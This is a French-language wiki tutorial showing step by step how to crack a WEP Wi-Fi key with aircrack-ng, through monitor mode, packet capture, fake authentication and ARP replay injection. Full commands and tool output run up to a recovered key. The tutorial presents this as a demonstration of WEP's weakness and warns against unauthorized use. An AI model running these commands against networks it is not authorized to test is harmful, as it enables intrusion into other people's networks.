CrackCleWep

From aldeid
Jump to: navigation, search
Translation.png
This article needs to be translated
This article has been copied from the old wiki and is in french. It needs to be translated into english. If you wish to participate, please send a mail to (click to reveal email)
Ssh-img013.png
Warning
The technique explained in this article is only for security purposes. Do not use any of the mentionned tools without authorizations.

.

Introduction

Ce tutoriel va vous apprendre à cracker une clé WEP.
Il a pour objectif de démontrer la faiblesse de ce type de cryptage afin de vous convaincre d'utiliser des clés plus robustes telles que WPA2.
Par ailleurs, l'attaque présentée dans le présent tutoriel est basée sur la réinjection de paquets ARP et pré-suppose qu'une station est connectée au point d'accès.
Il existe d'autres attaques (chopchop, fragmentation) qui permettent d'arriver aux mêmes fins sans station connectée, mais elles ne sont pas présentées dans ce tutoriel.
PS : pour des raisons de confidentialité, les adresses mac ont été tronquées et apparaissent sous la forme 00:11:22:**:**:**.
Les tests ont été effectués à partir d'un Dell Latitude D630 sous Ubuntu 8.10.

Installation

Utilisation de BackTrack

La distribution "live CD" ou "live USB" de BackTrack (http://www.remote-exploit.org/backtrack_download.html) contient tous les outils nécessaires pour suivre ce tutoriel.
Vous trouverez ici un tutoriel afin d'installer BackTrack sur une clé USB.

Installation à partir des packages

# apt-get install aircrack-ng

Installation à partir des sources

Dépendances

L'installation des dépendances suivantes est pré-requis si vous décidez d'installer aircrack-ng à partir des sources :

# apt-get install build-essential libssl-dev autoconf libtool

Installation manuelle de aircrack-ng

# cd /usr/local/src
# wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz
# tar xzvf aircrack-ng-1.0-rc1.tar.gz
# cd aircrack-ng-1.0-rc1
# make
# make install
Info.png
Note
Si vous avez une version plus ancienne de aircrack-ng installée, veuillez au préalable la désinstaller
# cd /usr/local/src/aircrack-ng-0.9.3
# make uninstall

Préparation de la carte

Installation des drivers ipwraw

Pour pouvoir utiliser le mode Monitor de la carte wifi du Dell Latitude D630, nous allons avoir besoin d'installer les drivers ipwraw.

# wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
# tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2 
# cd ipwraw-ng/
# make
# make install
# make install_ucode

Les lignes qui suivent permettent de « blacklister » les drivers afin qu'ils ne soient pas utilisés à l'ouverture de session. Ceux-ci seront donc utilisés « à la demande ».

# echo "blacklist ipwraw" | tee /etc/modprobe.d/ipwraw 
# depmod -ae

Changement des drivers

Pour utiliser la suite aircrack-ng, vous devez activer le mode monitor de votre carte wifi. Le mode Monitor (par opposition au mode Managed), permet d'"écouter" le réseau, alors que le mode Managed vous permet de vous connecter à un point d'accès (AP pour Access Point).
Sur certains PC (par exemple Dell Latitude D630), il est nécessaire d'installer les drivers ipwraw. Une fois ceux-ci installés, vous pouvez switcher d'un mode à l'autre.
Pour passer en mode Monitor :

# modprobe -r iwl3945
# modprobe ipwraw

Pour passer en mode Managed :

# modprobe -r ipwraw
# modprobe iwl3945

Activation de l'alias de la carte pour le mode monitor

# airmon-ng start wifi0
Interface            Chipset               Driver 
wifi0                Centrino a/b/g	        ipwraw-ng (monitor mode enabled)

Capture des paquets

# airodump-ng --write freebox --channel 11 wifi0

Crack-wep-001.png

Possibilité de réduire le champ de capture au point d'accès ciblé en ajoutant --bssid <MAC_AP> :

# airmon-ng --write freebox --channel 11 --bssid 32:AF:8C:**:**:** wifi0

L'objectif de cette opération consiste à récupérer les informations suivantes :

  • Adresse mac de l'AP (bssid) : 32:AF:8C:**:**:**
  • Adresse mac de la station connectée : 00:1F:3C:**:**:**
  • Le nom de la connexion (essid) : freebox

Test du mode d'association (fake authentication)

Cette étape est facultative, et permet de s'assurer que le routeur ne possède pas un mode d'association (contrôle de l'adresse MAC)
Ouvrir une seconde fenêtre et entrer la commande suivante :
Tester avec -h 00:11:22:33:44:55 permet de s'assurer que l'AP n'a pas de mode d'association.

# aireplay-ng -1 0 -h 00:11:22:33:44:55 -a 32:AF:8C:**:**:** -e freebox wifi0
The interface MAC (00:1C:BF:8C:7A:A3) doesn't match the specified MAC (-h).
      ifconfig wifi0 hw ether 00:11:22:33:44:55
08:34:37  Waiting for beacon frame (BSSID: 32:AF:8C:**:**:**)
08:34:38  Sending Authentication Request
08:34:38  Authentication successful
08:34:38  Sending Association Request
08:34:39  Association successful :-) 

Dans l'exemple précédent, l'association réussi. L'AP n'a donc pas de mode d'association.
Exemple d'AP filtrant :

# aireplay-ng -1 0 -h 00:11:22:33:44:55 -a 00:1B:11:**:**:** -e aldeid wifi0
The interface MAC (00:1C:BF:**:**:**) doesn't match the specified MAC (-h).

ifconfig wifi0 hw ether 00:11:22:33:44:55 08:45:03 Waiting for beacon frame (BSSID: 00:1B:11:**:**:**)
08:45:03 Sending Authentication Request
08:45:05 Sending Authentication Request
08:45:07 Sending Authentication Request
08:45:09 Sending Authentication Request

Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).

Injection de paquets

Attaque par réinjection d'ARP (ARP-request replay):

# aireplay-ng -3 -b 32:AF:8C:**:**:** -h 00:1F:3C:**:**:**  wifi0
The interface MAC (00:1C:BF:**:**:**) doesn't match the specified MAC (-h).

ifconfig wifi0 hw ether 00:1F:3C:**:**:**

Saving ARP requests in replay_arp-1129-235705.cap
You should also start airodump-ng to capture replies.
23:58:04  Packets per second adjusted to 375nt 394 packets...(7 pps)
23:58:06  Packets per second adjusted to 282nt 429 packets...(8 pps)
23:58:09  Packets per second adjusted to 212nt 485 packets...(9 pps)
23:58:11  Packets per second adjusted to 159nt 551 packets...(10 pps)
23:58:13  Packets per second adjusted to 120nt 613 packets...(11 pps)
23:58:16  Packets per second adjusted to 90sent 685 packets...(12 pps)
23:58:19  Packets per second adjusted to 68sent 755 packets...(13 pps)
23:58:23  Packets per second adjusted to 51sent 854 packets...(15 pps)
23:58:28  Packets per second adjusted to 39sent 987 packets...(16 pps)
23:58:36  Packets per second adjusted to 30sent 1179 packets...(18 pps)
23:59:09  Packets per second adjusted to 23 sent 1977 packets...(21 pps)
00:50:56  Packets per second adjusted to 18s), sent 67579 packets...(22 pps) 

Le champ #/s doit augmenter (voir écran airodump-ng)

Crackage de la clé

Le crackage de la clé s'effectue simplement avec aircrack-ng.
Pour un crack plus rapide et nécessitant moins d'IVS, vous pouvez utiliser aircrack-ptw.

# aircrack-ng -s freebox*.cap

                                Aircrack-ng 0.9.3

                [00:24:06] Tested 15991813 keys (got 137412 IVs)

  KB    depth   byte(vote)
   0    0/  1   78(  43) 57(  16) AC(   7) 28(   5) 59(   5) 5D(   5)   x
   1    0/  1   02(  34) CB(  16) 94(  13) AC(  13) FE(  13) 09(  12)
   2    0/  1   9F(  85) 78(  12) F0(  12) BD(   8) 25(   6) 18(   5)
   3    0/  4   CD(  28) 5D(  25) CE(  17) B1(  16) 2F(  12) 40(  10)

                        KEY FOUND! [ 78:29:9F:CD:70 ]

Decrypted correctly: 100%